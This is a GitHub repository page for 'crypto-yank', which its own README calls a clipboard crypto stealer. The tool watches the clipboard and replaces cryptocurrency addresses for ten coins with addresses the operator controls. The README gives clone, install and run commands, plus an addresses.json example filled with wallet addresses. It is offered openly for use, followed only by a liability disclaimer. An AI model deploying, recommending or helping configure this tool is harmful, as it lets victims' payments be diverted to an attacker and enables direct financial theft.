Skip to content

aalee313/crypto-yank

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

42 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Replace crypto-currency addresses with your own.

Demo:

About/Usage:

About:

Blog post

crypto-yank matches crypto-currency addresses found in the clipboard using regex. When no addresses are in the clipboard, crypto-yank will remain dormant and not interact with the users clipboard.

Usage:

git clone https://github.com/jacques-andre/crypto-yank
cd crypto-yank
pip3 install -r requirements.txt 
python3 crypto-yank.py
Optional arguments:
--log 

addresses.json: Holds the master addresses (what you want to replace the clipboard with). Change the "replace_me" strings with your own addresses.

If you don't want to monitor specific cryptos you can replace the string with "null".

Example:

addresses.json:

{
    "btc": "bc1qq9y4gc3c435uqhrctsp67kvyv4enqgky5p2375",
    "xmr": "null",
    "eth": "0x4BDDeddfbb17CAE7A89b305B494FFd70CCE5B29B",
    "dash": "null",
    "xrp": "null",
    "doge": "null",
    "ada" : "null",
    "dot" : "null",
    "lite" : "null"
}

Now crypto-yank will only monitor Bitcoin & Ethereum addresses.

Supported Coins:

  • Bitcoin ($BTC)
  • Dash ($DASH)
  • Ethereum ($ETH)
  • Monero ($XMR)
  • Litecoin ($LTC)
  • Cardano ($ADA)
  • Polkadot ($DOT)
  • Doge ($DOGE)
  • Ripple ($XRP)
  • Tron ($TRX)

More on the way....

Warning:

I am not responsible for any misuse or damage caused by this program. Use this tool at your own risk!

About

crypto-yank is a clipboard crypto stealer that monitors for crypto addresses and replaces them with your own.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages

  • Python 100.0%